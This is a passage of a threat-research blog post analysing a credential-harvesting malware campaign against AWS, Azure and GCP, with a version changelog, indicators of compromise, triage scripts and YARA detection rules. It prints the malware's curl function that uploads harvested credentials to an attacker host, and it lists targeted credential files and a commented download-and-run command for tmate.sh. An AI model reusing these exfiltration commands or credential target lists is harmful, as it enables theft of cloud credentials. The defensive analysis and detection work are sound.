
Developers are not the only people who have adopted the agile methodology for their development processes. From 2023-06-15 to 2023-07-11, Permiso Security’s p0 Labs team identified and tracked an attacker developing and deploying eight (8) incremental iterations of their credential harvesting malware while continuing to develop infrastructure for an upcoming (spoiler: now launched) campaign targeting various cloud services.

While Aqua Security published a blog last week detailing the stages of this under-development campaign that involve infected Docker images, today Permiso p0 Labs and SentinelLabs are releasing joint research highlighting the incremental updates to the cloud credential harvesting malware samples we systematically collected by monitoring the attacker's infrastructure. So get out of your seats and enjoy this scrum meeting stand-up dedicated to sharing knowledge about this actor's campaign and the tooling they will use to steal more cloud credentials.

If you like IDA screenshots in your analysis blogs, be sure to check out SentinelLabs’ take on this campaign!

Previous Campaigns

There have been many campaigns in which actors used similar tooling to scrape cloud credentials while also mass-deploying cryptomining software. As a refresher, in December the Permiso team reported the details of an actor targeting public-facing Jupyter Notebooks with this toolset.

Our friends over at Cado have also reported extensively on previous campaigns.

Active Campaign

On 2023-07-11, while we were preparing the release of this blog about the in-development toolset, the actor kicked off their campaign.



The file b.sh is the initializing script that downloads and deploys the full tool suite functionality. The main features are to install a backdoor for continued access, deploy crypto mining utilities, and search for and spread to other vulnerable systems.



Currently (2023-07-12), there are 39 compromised systems in this campaign.

What’s New?

The cloud credential harvesting utilities in this campaign have some notable differences from previous versions. The following are the highlights of the modifications:

- Multi-cloud Support:
  - GCP support added:
    - GCLOUD_CREDS_FILES=("config_sentinel" "gce" ".last_survey_prompt.yaml" "config_default" "active_config" "credentials.db" "access_tokens.db" ".last_update_check.json" ".last_opt_in_prompt.yaml" ".feature_flags_config.yaml" "adc.json" "resource.cache")
  - Azure support added by looking for and extracting credentials from any files named azure.json

- Numerous structural and syntactical changes highlight the shift from AWS targeting to multi-cloud:
  - Sensitive file name arrays split by cloud service:
    - CRED_FILE_NAMES → AWS_CREDS_FILES, AZURE_CREDS_FILES and GCLOUD_CREDS_FILES
  - Function names genericized:
    - send_aws_data → send_data
  - Output section headers modified:
    - INFO → AWS INFO
    - IAM → IAM USERDATA
    - EC2 → EC2 USERDATA

- Targeted Files: Added "kubeconfig", "adc.json", "azure.json", "clusters.conf", "docker-compose.yaml" and ".env" to the CRED_FILE_NAMES variable. "redis.conf.not.exist" was added in a new MIXED_CREDFILES variable.

- New Curl: Shifted from the dload function ("curl without curl") to downloading a staged curl binary and, eventually, to using the native curl binary.

- AWS-CLI: Uses aws sts get-caller-identity to validate cloud credentials and retrieve identity information.

- Infrastructure: Most previous campaigns hosted utilities and C2 on a single domain. In this campaign the actor is using multiple FQDNs (including one noteworthy FQDN masquerading as an EC2 instance: ap-northeast-1.compute.internal.anondns[.]net).

- Numerous elements of the actor's infrastructure and code suggest that the author is a native German speaker (in addition to the fact that the open-source TeamTNT tooling already has many German elements in its code).



- One of the intermediate versions of aws.sh referenced the FQDN ap-northeast-1.compute.internal.anondns[.]net, which returned the German error message "Fehler! vergleiche bitte die Authentifizierungsmerkmale in beiden Scripten!!!" (which translates to "Error! Please compare the authentication features in both scripts!!!") when visited by a VirusTotal scan on 2023-06-23:



- A Google search for the above error message reveals a single hit: a post on a German forum from 2008-10-08 (https://administrator.de/tutorial/upload-von-dateien-per-batch-curl-und-php-auf-einen-webserver-ohne-ftp-98399.html) containing code for a PHP file uploader called upload.php, whose failed-authentication else block echoes the exact error statement. The filename upload.php was also the URI used by the threat actor's aws.sh versions 2 and 3, and the attacker's curl command (shown next) contains unique argument syntax identical to the example command in the same forum post.

- The last German nods are in the curl command arguments. The more blatant indicator is the argument Datei= in aws.sh versions 2-8, since "Datei" is the German word for "file". The more subtle observation is in the hardcoded password (oeireopüigreigroei) in aws.sh versions 2 and 3, specifically the presence of its only non-ASCII character: ü.

```bash
send_data(){
# multipart/form-data POST of the harvested results file ($CSOF) to the C2 upload endpoint
curl -F "username=jegjrlgjhdsgjh" -F "password=oeireopüigreigroei" -F \
"Datei=@"$CSOF"" -F "Send=1" https://everlost.anondns.net/upload.php
}
```

Both the username and password are indicative of a keyboard run: the username falls largely on the home row keys and the password largely on the upper row keys. However, since every other character is plain ASCII, the most likely way to produce a single ü is the use of a virtual keyboard. Because the ü immediately follows the letter p in the password, and the only two virtual keyboard layouts that place ü adjacent to p are the Estonian and German layouts, this points to a German (or Estonian) keyboard.
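For quick triage of a suspect script, the same combination of curl form fields can be checked with plain grep. The following is a minimal, hypothetical sketch (the function name is ours, not the actor's or Permiso's): it only tests that the fixed strings Datei=@, "Send=1", "username= and "password= all appear in a file. The YARA rule P0_Hunting_Common_TeamTNT_CurlArgs_1 in the Detections section is the more precise option.

```bash
#!/usr/bin/env bash
# Hypothetical triage helper: returns 0 if a file contains all four curl
# form-field fragments seen in aws.sh versions 2-8, otherwise 1.
has_datei_upload_signature() {
  local file="$1"
  # -q: exit status only; -F: treat the pattern as a fixed string
  grep -qF 'Datei=@' "$file" &&
    grep -qF '"Send=1"' "$file" &&
    grep -qF '"username=' "$file" &&
    grep -qF '"password=' "$file"
}
```

Usage: `has_datei_upload_signature /path/to/suspect.sh && echo "curl upload signature present"`. Requiring all four fragments keeps false positives low, at the cost of missing variants that rename any single field.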

Attacker Development LifeCycle

Monitoring this attacker's infrastructure over the course of a month has given the Permiso team insight into the actor's development process and the modifications made in each iteration. What better way to display this than with a changelog? The following changelog details the incremental updates made to the credential harvesting utility aws.sh:

```text
# v1(28165d28693ca807fb3d4568624c5ba9) -> v2(b9113ccc0856e5d44bab8d3374362a06)
[*] updated function name from int_main() to run_aws_grabber() (though not executed in script)
[*] updated function name from send_aws_data() to send_data()
[*] updated function name from files_aws() to cred_files()
[*] updated function name from docker_aws() to get_docker() with similar functionality
[*] split env_aws() function's logic into three (3) new functions: get_aws_infos(), get_aws_meta(), get_aws_env()
[+] added function get_awscli_data() which executes aws sts get-caller-identity command
[+] added two (2) functions with new functionality (returning contents of sensitive file names and environment variables): get_azure(), get_google()
[-] removed strings_proc_aws function containing strings /proc/*/env* | sort -u | grep 'AWS\|AZURE\|KUBE' command enumerating environment variables
[-] removed ACF file name array (though all values except .npmrc, cloud and credentials.gpg were already duplicated in CRED_FILE_NAMES array)
[+] added new empty AZURE_CREDS_FILES file name array (though not used in script)
[+] added new AWS_CREDS_FILES file name array (though not used in script) with the following values moved from CRED_FILE_NAMES file name array: credentials, .s3cfg, .passwd-s3fs, .s3backer_passwd, .s3b_config, s3proxy.conf
[+] added new GCLOUD_CREDS_FILES file name array (though not used in script) with the following net new values: config_sentinel, gce, .last_survey_prompt.yaml, config_default, active_config, credentials.db, .last_update_check.json, .last_opt_in_prompt.yaml, .feature_flags_config.yaml, resource.cache
[+] added copy of duplicate values access_tokens.db and adc.json from CRED_FILE_NAMES file name array to GCLOUD_CREDS_FILES file name array
[+] added netrc, kubeconfig, adc.json, azure.json, env, clusters.conf, grafana.ini and an empty string to CRED_FILE_NAMES file name array
[-] removed credentials.db from CRED_FILE_NAMES file name array
[-] removed dload function (downloader capability, i.e. "curl without curl")
[+] added commented dload function invocation for posting final results
[+] added commented wget command to download and execute https://everlost.anondns[.]net/cmd/tmate.sh
[*] replaced execution of dload function with native curl binary
[*] replaced references to /tmp/.curl with native curl binary
[-] removed base64 encoding of final results
[+] added username and password to curl command: "username=jegjrlgjhdsgjh" "password=oeireopüigreigroei"
[*] updated URI for posting final results from /in.php?base64=$SEND_B64_DATA to /upload.php
[*] renamed LOCK_FILE from /tmp/...aws4 to /tmp/..a.l$(echo $RANDOM)
[-] removed rm -f $LOCK_FILE command
[-] removed history -cw command (clear history list and overwrite history file) at end of script
[*] converted numerous long commands into shorter multi-line syntax
-------
# v2(b9113ccc0856e5d44bab8d3374362a06) -> v3(d9ecceda32f6fa8a7720e1bf9425374f)
[+] added execution of previously unused run_aws_grabber() function
[+] added function get_prov_vars with nearly identical strings /proc/*/env* command found in previously removed strings_proc_aws function (though with previous grep 'AWS\|AZURE\|KUBE' command removed)
[+] added logic to search for files listed in previously unused file name arrays: AWS_CREDS_FILES, GCLOUD_CREDS_FILES
[+] added new file name array MIXED_CREDFILES=("redis.conf") (though not used in script)
[+] added docker-compose.yaml to CRED_FILE_NAMES file name array
[*] updated env to .env in CRED_FILE_NAMES file name array
[-] removed config from AWS_CREDS_FILES file name array
[*] updated echo output section header from INFO to AWS INFO
[*] updated echo output section header from IAM to IAM USERDATA
[*] updated echo output section header from EC2 to EC2 USERDATA
[-] removed commented dload function invocation for posting final results
-------
# v3(d9ecceda32f6fa8a7720e1bf9425374f) -> v4(0855b8697c6ebc88591d15b954bcd15a)
[*] replaced strings /proc/*/env* command with cat /proc/*/env* command in get_prov_vars function
[*] updated username and password in curl command from "username=jegjrlgjhdsgjh" "password=oeireopüigreigroei" to "username=1234" -F "password=5678"
[*] updated FQDN for posting final results from everlost.anondns[.]net to ap-northeast-1.compute.internal.anondns[.]net (masquerading as AWS EC2 instance FQDN)
[*] updated URI for posting final results from /upload.php to /insert/keys.php
-------
# v4(0855b8697c6ebc88591d15b954bcd15a) -> v5(f7df739f865448ac82da01b3b1a97041)
[*] updated FQDN for posting final results from ap-northeast-1.compute.internal.anondns[.]net to silentbob.anondns[.]net
[+] added SRCURL variable to store FQDN (later expanded in final curl command's URL)
[+] added if type aws logic to only execute run_aws_grabber function if AWS CLI binary is present
-------
# v5(f7df739f865448ac82da01b3b1a97041) -> v6(1a37f2ef14db460e5723f3c0b7a14d23)
[*] updated redis.conf to redis.conf.not.exist in MIXED_CREDFILES file name array
[*] updated LOCK_FILE variable from /tmp/..a.l$(echo $RANDOM) to /tmp/..a.l
-------
# v6(1a37f2ef14db460e5723f3c0b7a14d23) -> v7(99f0102d673423c920af1abc22f66d4e)
[-] removed grafana.ini from CRED_FILE_NAMES file name array
-------
# v7(99f0102d673423c920af1abc22f66d4e) -> v8(5daace86b5e947e8b87d8a00a11bc3c5)
[-] removed MIXED_CREDFILES file name array
[+] added new file name array DBS_CREDFILES=("postgresUser.txt" "postgresPassword.txt")
[+] added awsAccessKey.txt and awsKey.txt to AWS_CREDS_FILES file name array
[+] added azure.json to AZURE_CREDS_FILES file name array (already present in CRED_FILE_NAMES file name array)
[+] added hostname command output to final result
[+] added curl -sLk ipv4.icanhazip.com -o- command output to final result
[+] added cat /etc/ssh/sshd_config | grep 'Port '|awk '{print $2}' command output to final result
[*] updated LOCK_FILE variable from /tmp/..a.l to /tmp/..pscglf_
```
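The changelog also records every LOCK_FILE name the script used: /tmp/...aws4 (v1), /tmp/..a.l$(echo $RANDOM) (v2 to v5), /tmp/..a.l (v6 and v7) and /tmp/..pscglf_ (v8). Because v2 removed the rm -f $LOCK_FILE command, these files may remain on disk after execution, which makes them a cheap host check. The sketch below is hypothetical (not from the original research); the directory argument exists only so the function can be tested against something other than /tmp.

```bash
#!/usr/bin/env bash
# Hypothetical host check: print any file in DIR (default /tmp) whose name
# matches a LOCK_FILE name recorded in the aws.sh changelog.
find_awssh_lock_files() {
  local dir="${1:-/tmp}"
  local f
  # ..a.l* covers both "..a.l" (v6-v7) and "..a.l<random number>" (v2-v5);
  # the pattern starts with a literal dot, so the glob matches these dotfiles.
  for f in "$dir"/...aws4 "$dir"/..a.l* "$dir"/..pscglf_; do
    # Unmatched globs stay literal, so only print paths that actually exist
    [ -e "$f" ] && printf '%s\n' "$f"
  done
  return 0
}
```

Usage: `find_awssh_lock_files` (scans /tmp). A hit is only a lead, since any process could create a file with one of these names.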

Attacker Infrastructure

Actors using modified TeamTNT tooling like this have a propensity for using the hosting service Nice VPS. This campaign is no exception in that regard. The actor has registered at least four (4) domains for this campaign through anondns, all but one of which currently point to the Nice VPS IP address 45.9.148.108. The remaining domain, everfound.anondns.net, currently resolves to the IP address 207.154.218.221.

The domains currently involved in this campaign are:

| Domain | First Seen |
|---|---|
| everlost.anondns[.]net | 2023-06-11 10:35:09 UTC |
| ap-northeast-1.compute.internal.anondns[.]net | 2023-06-16 15:24:16 UTC |
| silentbob.anondns[.]net | 2023-06-24 16:53:46 UTC |
| everfound.anondns[.]net | 2023-07-02 21:07:50 UTC |

While the majority of recent attacker development activities have occurred on silentbob.anondns.net, we find the AWS masquerade domain ap-northeast-1.compute.internal.anondns.net to be the most interesting, but Jay & Silent Bob make for much better blog cover art so we respect the attacker’s choice in FQDNs.
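Genuine EC2 private DNS names end in .compute.internal (for example ip-10-0-0-1.ap-northeast-1.compute.internal; us-east-1 uses ec2.internal instead), whereas the masquerade domain continues past that string into anondns.net. A minimal sketch of a hypothetical heuristic for DNS or proxy logs follows; the function name and the rule itself are our assumptions, not part of the original research, and defanged names such as anondns[.]net must be refanged before checking.

```bash
#!/usr/bin/env bash
# Hypothetical heuristic: returns 0 if NAME contains "compute.internal"
# followed by further labels (i.e. it only looks like an EC2 private DNS name).
is_compute_internal_masquerade() {
  local name
  # Normalize: lowercase and drop a trailing root dot
  name=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
  name="${name%.}"
  case "$name" in
    *.compute.internal) return 1 ;;   # ends in the genuine EC2 private suffix
    *compute.internal.*) return 0 ;;  # more labels after "compute.internal"
    *) return 1 ;;
  esac
}
```

Usage: `is_compute_internal_masquerade ap-northeast-1.compute.internal.anondns.net && echo "possible EC2 masquerade"`. Matching on the position of the suffix, rather than on the string anywhere in the name, is what separates the masquerade from legitimate internal lookups.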

Indicators

| Indicator | Type | Notes |
|---|---|---|
| everlost.anondns[.]net | Domain | |
| ap-northeast-1.compute.internal.anondns[.]net | Domain | |
| silentbob.anondns[.]net | Domain | |
| everfound.anondns[.]net | Domain | |
| 207.154.218[.]221 | IPv4 | |
| 45.9.148[.]108 | IPv4 | |
| 28165d28693ca807fb3d4568624c5ba9 | MD5 | aws.sh v1 |
| b9113ccc0856e5d44bab8d3374362a06 | MD5 | aws.sh v2 |
| d9ecceda32f6fa8a7720e1bf9425374f | MD5 | aws.sh v3 |
| 0855b8697c6ebc88591d15b954bcd15a | MD5 | aws.sh v4 |
| f7df739f865448ac82da01b3b1a97041 | MD5 | aws.sh v5 |
| 1a37f2ef14db460e5723f3c0b7a14d23 | MD5 | aws.sh v6 |
| 99f0102d673423c920af1abc22f66d4e | MD5 | aws.sh v7 |
| 5daace86b5e947e8b87d8a00a11bc3c5 | MD5 | aws.sh v8 (grab.sh) |
| 92d6cc158608bcec74cf9856ab6c94e5 | MD5 | user.sh |
| cfb6d7788c94857ac5e9899a70c710b6 | MD5 | int.sh |
| 7044a31e9cd7fdbf10e6beba08c78c6b | MD5 | clean.sh |
| 58b92888443cfb8a4720645dc3dc9809 | MD5 | xc3.sh |
| f60b75ddeaf9703277bb2dc36c0f114b | MD5 | b.sh (Install script) |
| 2044446e6832577a262070806e9bf22c | MD5 | chattr |
| c2465e78a5d11afd74097734350755a4 | MD5 | curl.full |
| f13b8eedde794e2a9a1e87c3a2b79bf4 | MD5 | tmate.sh |
| 87c8423e0815d6467656093bff9aa193 | MD5 | a |
| 9e174082f721092508df3f1aae3d6083 | MD5 | run.sh |
| 203fe39ff0e59d683b36d056ad64277b | MD5 | massscan |
| 2514cff4dbfd6b9099f7c83fc1474a2d | MD5 | |
| dafac2bc01806db8bf19ae569d85deae | MD5 | data.sh |
| 43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U | Wallet | |
| hxxp://silentbob.anondns.net/insert/metadata.php | URL | |
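To sweep files against the MD5 indicators above without extra tooling, a small lookup is enough. This is a hypothetical helper, not something published with the research; it assumes GNU coreutils md5sum (on macOS, `md5 -q FILE` prints the bare hash instead).

```bash
#!/usr/bin/env bash
# MD5 indicators copied from the table above.
IOC_MD5S=(
  28165d28693ca807fb3d4568624c5ba9 b9113ccc0856e5d44bab8d3374362a06
  d9ecceda32f6fa8a7720e1bf9425374f 0855b8697c6ebc88591d15b954bcd15a
  f7df739f865448ac82da01b3b1a97041 1a37f2ef14db460e5723f3c0b7a14d23
  99f0102d673423c920af1abc22f66d4e 5daace86b5e947e8b87d8a00a11bc3c5
  92d6cc158608bcec74cf9856ab6c94e5 cfb6d7788c94857ac5e9899a70c710b6
  7044a31e9cd7fdbf10e6beba08c78c6b 58b92888443cfb8a4720645dc3dc9809
  f60b75ddeaf9703277bb2dc36c0f114b 2044446e6832577a262070806e9bf22c
  c2465e78a5d11afd74097734350755a4 f13b8eedde794e2a9a1e87c3a2b79bf4
  87c8423e0815d6467656093bff9aa193 9e174082f721092508df3f1aae3d6083
  203fe39ff0e59d683b36d056ad64277b 2514cff4dbfd6b9099f7c83fc1474a2d
  dafac2bc01806db8bf19ae569d85deae
)

# Returns 0 if the given MD5 (any letter case) is in IOC_MD5S.
md5_is_known_ioc() {
  local h
  h=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
  # -x: whole-line match; -F: fixed string; -q: exit status only
  printf '%s\n' "${IOC_MD5S[@]}" | grep -qxF -- "$h"
}

# Hashes FILE with md5sum (assumed GNU coreutils) and checks it against IOC_MD5S.
check_file_against_iocs() {
  local hash
  # md5sum prints "<hash>  <path>"; keep only the hash field
  hash=$(md5sum -- "$1" | awk '{print $1}')
  md5_is_known_ioc "$hash"
}
```

Usage: `for f in /tmp/*.sh; do check_file_against_iocs "$f" && echo "IOC match: $f"; done`. Since the actor shipped eight versions in under a month, hash matching only catches exact copies; the YARA rules below are meant for the variants.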

Detections

```yara
rule P0_Hunting_AWS_CredFileNames_1 {
    meta:
        description = "Detecting presence of scripts searching for numerous AWS credential file names"
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "3e2cddf76334529a14076c3659a68d92"
        md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_04 = "28165d28693ca807fb3d4568624c5ba9"
        md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_06 = "f7df739f865448ac82da01b3b1a97041"
        md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_08 = "99f0102d673423c920af1abc22f66d4e"
        md5_09 = "99f0102d673423c920af1abc22f66d4e"
        md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $credFileAWS_01 = "credentials"
        $credFileAWS_02 = ".s3cfg"
        $credFileAWS_03 = ".passwd-s3fs"
        $credFileAWS_04 = ".s3backer_passwd"
        $credFileAWS_05 = ".s3b_config"
        $credFileAWS_06 = "s3proxy.conf"
        $credFileAWS_07 = "awsAccessKey.txt"
        $credFileAWS_08 = "awsKey.txt"
        $fileSearchCmd = "find "
        $fileAccessCmd_01 = "cat "
        $fileAccessCmd_02 = "strings "
        $fileAccessCmd_03 = "cp "
        $fileAccessCmd_04 = "mv "
    condition:
        (3 of ($credFileAWS*)) and $fileSearchCmd and (any of ($fileAccessCmd*))
}

rule P0_Hunting_AWS_EnvVarNames_1 {
    meta:
        description = "Detecting presence of scripts searching for numerous environment variables containing sensitive AWS credential information. Explicitly excluding LinPEAS (and its variants) to remove noise since it is already well-detected."
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "3e2cddf76334529a14076c3659a68d92"
        md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_04 = "28165d28693ca807fb3d4568624c5ba9"
        md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_06 = "f7df739f865448ac82da01b3b1a97041"
        md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_08 = "99f0102d673423c920af1abc22f66d4e"
        md5_09 = "99f0102d673423c920af1abc22f66d4e"
        md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $shellHeader_01 = "#!/bin/sh"
        $shellHeader_02 = "#!/bin/bash"
        $envVarAWSPrefixSyntax_01 = "$AWS_"
        $envVarAWSPrefixSyntax_02 = "${AWS_"
        $envVarAWS_01 = "AWS_ACCESS_KEY_ID"
        $envVarAWS_02 = "AWS_SECRET_ACCESS_KEY"
        $envVarAWS_03 = "AWS_SESSION_TOKEN"
        $envVarAWS_04 = "AWS_SHARED_CREDENTIALS_FILE"
        $envVarAWS_05 = "AWS_CONFIG_FILE"
        $envVarAWS_06 = "AWS_DEFAULT_REGION"
        $envVarAWS_07 = "AWS_REGION"
        $envVarAWS_08 = "AWS_EC2_METADATA_DISABLED"
        $envVarEcho = "then echo "
        $linPEAS_01 = "#-------) Checks pre-everything (---------#"
        $linPEAS_02 = "--) FAST - Do not check 1min of procceses and su brute"
    condition:
        (any of ($shellHeader*)) and (1 of ($envVarAWSPrefixSyntax*)) and (4 of ($envVarAWS*)) and (#envVarEcho >= 4) and not (all of ($linPEAS*))
}
```

```yara
rule P0_Hunting_AWS_SedEnvVarExtraction_1 {
    meta:
        description = "Detecting presence of scripts using native sed (Stream Editor) utility extracting numerous environment variables containing sensitive AWS credential information"
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "3e2cddf76334529a14076c3659a68d92"
        md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_04 = "28165d28693ca807fb3d4568624c5ba9"
        md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_06 = "f7df739f865448ac82da01b3b1a97041"
        md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_08 = "99f0102d673423c920af1abc22f66d4e"
        md5_09 = "99f0102d673423c920af1abc22f66d4e"
        md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $grepPropAWS = "| grep 'AccessKeyId\\|SecretAccessKey\\|Token\\|Expiration' |"
        $awsCliConfigureCmd = "aws configure set aws_"
        $sedPropAWS_01 = "sed 's# \"AccessKeyId\" : \"#\\n\\naws configure set aws_access_key_id #g'"
        $sedPropAWS_02 = "sed 's# \"SecretAccessKey\" : \"#aws configure set aws_secret_access_key #g'"
        $sedPropAWS_03 = "sed 's# \"Token\" : \"#aws configure set aws_session_token #g'"
        $sedPropAWS_04 = "sed 's# \"Expiration\" : \"#\\n\\nExpiration : #g'"
    condition:
        all of them
}
```

```yara
rule P0_Hunting_Azure_EnvVarNames_1 {
    meta:
        description = "Detecting presence of scripts searching for numerous environment variables containing sensitive Azure credential information"
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_04 = "f7df739f865448ac82da01b3b1a97041"
        md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_06 = "99f0102d673423c920af1abc22f66d4e"
        md5_07 = "99f0102d673423c920af1abc22f66d4e"
        md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $envVarAzurePrefixSyntax_01 = "$AZURE_"
        $envVarAzurePrefixSyntax_02 = "${AZURE_"
        $envVarAzure_01 = "AZURE_CREDENTIAL_FILE"
        $envVarAzure_02 = "AZURE_GUEST_AGENT_CONTAINER_ID"
        $envVarAzure_03 = "AZURE_CLIENT_ID"
        $envVarAzure_04 = "AZURE_CLIENT_SECRET"
        $envVarAzure_05 = "AZURE_TENANT_ID"
        $envVarAzure_06 = "AZURE_SUBSCRIPTION_ID"
        $envVarEcho = "then echo "
    condition:
        (1 of ($envVarAzurePrefixSyntax*)) and (3 of ($envVarAzure*)) and (#envVarEcho >= 3)
}
```

```yara
rule P0_Hunting_GCP_CredFileNames_1 {
    meta:
        description = "Detecting presence of scripts searching for numerous Google Cloud Platform (GCP) credential file names. Explicitly excluding LinPEAS (and its variants) to remove noise since it is already well-detected."
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_04 = "f7df739f865448ac82da01b3b1a97041"
        md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_06 = "99f0102d673423c920af1abc22f66d4e"
        md5_07 = "99f0102d673423c920af1abc22f66d4e"
        md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $shellHeader_01 = "#!/bin/sh"
        $shellHeader_02 = "#!/bin/bash"
        $credFileGCP_01 = "active_config"
        $credFileGCP_02 = "gce"
        $credFileGCP_03 = ".last_survey_prompt.yaml"
        $credFileGCP_04 = ".last_opt_in_prompt.yaml"
        $credFileGCP_05 = ".last_update_check.json"
        $credFileGCP_06 = ".feature_flags_config.yaml"
        $credFileGCP_07 = "config_default"
        $credFileGCP_08 = "config_sentinel"
        $credFileGCP_09 = "credentials.db"
        $credFileGCP_10 = "access_tokens.db"
        $credFileGCP_11 = "adc.json"
        $credFileGCP_12 = "resource.cache"
        $fileSearchCmd = "find "
        $fileAccessCmd_01 = "cat "
        $fileAccessCmd_02 = "strings "
        $fileAccessCmd_03 = "cp "
        $fileAccessCmd_04 = "mv "
        $linPEAS_01 = "#-------) Checks pre-everything (---------#"
        $linPEAS_02 = "--) FAST - Do not check 1min of procceses and su brute"
    condition:
        (any of ($shellHeader*)) and (5 of ($credFileGCP*)) and $fileSearchCmd and (any of ($fileAccessCmd*)) and not (all of ($linPEAS*))
}
```

```yara
rule P0_Hunting_GCP_EnvVarNames_1 {
    meta:
        description = "Detecting presence of scripts searching for numerous environment variables containing sensitive GCP credential information"
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_04 = "f7df739f865448ac82da01b3b1a97041"
        md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_06 = "99f0102d673423c920af1abc22f66d4e"
        md5_07 = "99f0102d673423c920af1abc22f66d4e"
        md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $shellHeader_01 = "#!/bin/sh"
        $shellHeader_02 = "#!/bin/bash"
        $envVarGCPPrefixSyntax_01 = "$GOOGLE_"
        $envVarGCPPrefixSyntax_02 = "${GOOGLE_"
        $envVarGCP_01 = "GOOGLE_API_KEY"
        $envVarGCP_02 = "GOOGLE_DEFAULT_CLIENT_ID"
        $envVarGCP_03 = "GOOGLE_DEFAULT_CLIENT_SECRET"
        $envVarEcho = "then echo "
    condition:
        (any of ($shellHeader*)) and (1 of ($envVarGCPPrefixSyntax*)) and (2 of ($envVarGCP*)) and (#envVarEcho >= 2)
}
```

```yara
rule P0_Hunting_Common_CredFileNames_1 {
    meta:
        description = "Detecting presence of scripts searching for numerous common credential file names. Explicitly excluding LinPEAS (and its variants) to remove noise since it is already well-detected."
        author = "daniel.bohannon@permiso.io (@danielhbohannon)"
        date = "2023-07-12"
        reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
        md5_01 = "3e2cddf76334529a14076c3659a68d92"
        md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
        md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
        md5_04 = "28165d28693ca807fb3d4568624c5ba9"
        md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
        md5_06 = "f7df739f865448ac82da01b3b1a97041"
        md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
        md5_08 = "99f0102d673423c920af1abc22f66d4e"
        md5_09 = "99f0102d673423c920af1abc22f66d4e"
        md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
    strings:
        $shellHeader_01 = "#!/bin/sh"
        $shellHeader_02 = "#!/bin/bash"
        $credFileCommon_01 = "authinfo2"
        $credFileCommon_02 = "access_tokens.db"
        $credFileCommon_03 = ".smbclient.conf"
        $credFileCommon_04 = ".smbcredentials"
        $credFileCommon_05 = ".samba_credentials"
        $credFileCommon_06 = ".pgpass"
        $credFileCommon_07 = "secrets"
        $credFileCommon_08 = ".boto"
        $credFileCommon_09 = "netrc"
        $credFileCommon_10 = ".git-credentials"
        $credFileCommon_11 = "api_key"
        $credFileCommon_12 = "censys.cfg"
        $credFileCommon_13 = "ngrok.yml"
        $credFileCommon_14 = "filezilla.xml"
        $credFileCommon_15 = "recentservers.xml"
        $credFileCommon_16 = "queue.sqlite3"
        $credFileCommon_17 = "servlist.conf"
        $credFileCommon_18 = "accounts.xml"
        $credFileCommon_19 = "kubeconfig"
        $credFileCommon_20 = "adc.json"
        $credFileCommon_21 = "clusters.conf"
        $credFileCommon_22 = "docker-compose.yaml"
        $credFileCommon_23 = ".env"
        $fileSearchCmd = "find "
        $fileAccessCmd_01 = "cat "
        $fileAccessCmd_02 = "strings "
        $fileAccessCmd_03 = "cp "
        $fileAccessCmd_04 = "mv "
        $linPEAS_01 = "#-------) Checks pre-everything (---------#"
        $linPEAS_02 = "--) FAST - Do not check 1min of procceses and su brute"
    condition:
